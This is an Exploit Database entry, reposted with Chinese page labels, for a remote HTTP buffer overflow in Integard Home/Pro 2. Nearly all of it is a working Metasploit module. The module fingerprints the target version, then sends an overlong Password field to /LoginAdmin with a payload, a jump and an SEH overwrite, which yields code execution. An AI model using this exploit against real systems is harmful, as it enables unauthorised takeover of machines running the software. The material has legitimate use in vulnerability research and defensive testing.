Integard Home and Pro 2 – Remote HTTP Buffer Overflow

• Exploit Database
• 9 阅读

• 作者： Lincoln, Nullthreat, rick2600
  日期： 2010-09-07
• 类别：

  • remote
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/14941/

• class Metasploit3 < Msf::Exploit::Remote
  
  	include Msf::Exploit::Remote::HttpClient
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'Integard Home/Pro version 2.0',
  			'Description'=> %q{
  					Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
  			},
  			'Author'=>
  				[
  					'Lincoln',
  					'Nullthreat',
  					'rick2600',
  					'corelanc0d3r' 
  				],
  			'License' => MSF_LICENSE,
  			'Version' => '$Revision: $',
  			'References'=>
  				[
  					['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
  				],
  			'DefaultOptions' =>
  				{
  					'EXITFUNC' => 'thread',
  				},
  			'Payload'=>
  				{
  					'Space'=> 2000,
  					'BadChars'=> "\x00\x20\x26\x2f\x3d\x3f\x5c",
  					'StackAdjustment' => -1500,
  				},
  			'Platform' => 'win',
  			'Privileged' => false,
  			'Targets'=>
  				[
  					[ 'Automatic Targeting',{ 'auto' => true }],
  					[ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
  					[ 'Integard Pro2.2.0.9026', { 'Ret' => 0x0040362C,}],
  				],
  			'DefaultTarget'=> 0))
  
  		register_options(
  			[
  				Opt::RPORT(18881)
  			], self.class )
  	end
  
  
  	def exploit
  		mytarget = target
  		continueattack=true
  		if(target['auto'])
  			mytarget = nil
  			print_status("[*] Automatically detecting the target...")
  			connect
  			response = send_request_raw(
  			{'uri' => '/banner.jpg', 
  			'version' => '1.1', 
  			'method' => 'GET'
  			}, 5)
  			contlength = response['Content-Length']
  			if (contlength == "24584")
  				print_status("[!] Found Version - Integard Home")
  				mytarget = self.targets[1]
  			elsif (contlength == "23196")
  				print_status("[!] Found Version - Integard Pro")
  				mytarget = self.targets[2]
  			else
  				print_status("[-] Unknown Version")
  				continueattack=false
  			end
  			disconnect
  		end
  		if continueattack
  			print_status("[!] Selected Target: #{mytarget.name}")
  			print_status("[*] Building Buffer")
  			pay = payload.encoded
  			junk = rand_text_alpha_upper(3091 - pay.length)
  			jmp = "\xE9\x2B\xF8\xFF\xFF"
  			nseh = "\xEB\xF9\x90\x90"
  			seh = [mytarget.ret].pack('V')
  			buffer = junk + pay + jmp + nseh + seh
  			print_status("[*] Sending Request")
  			post_data = "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
  			req = "/LoginAdmin"
  			connect
  			send_request_raw({
  				'uri' => req,
  				'version' => '1.1',
  				'method' => 'POST',
  				'headers' => 
  					{
  					'Host' => '192.168.1.1:18881',
  					'Content-Length' => 1074
  					},
  				'data' => post_data
  				}, 5)
  			print_status("[*] Request Sent")
  			handler
  		end
  	end
  end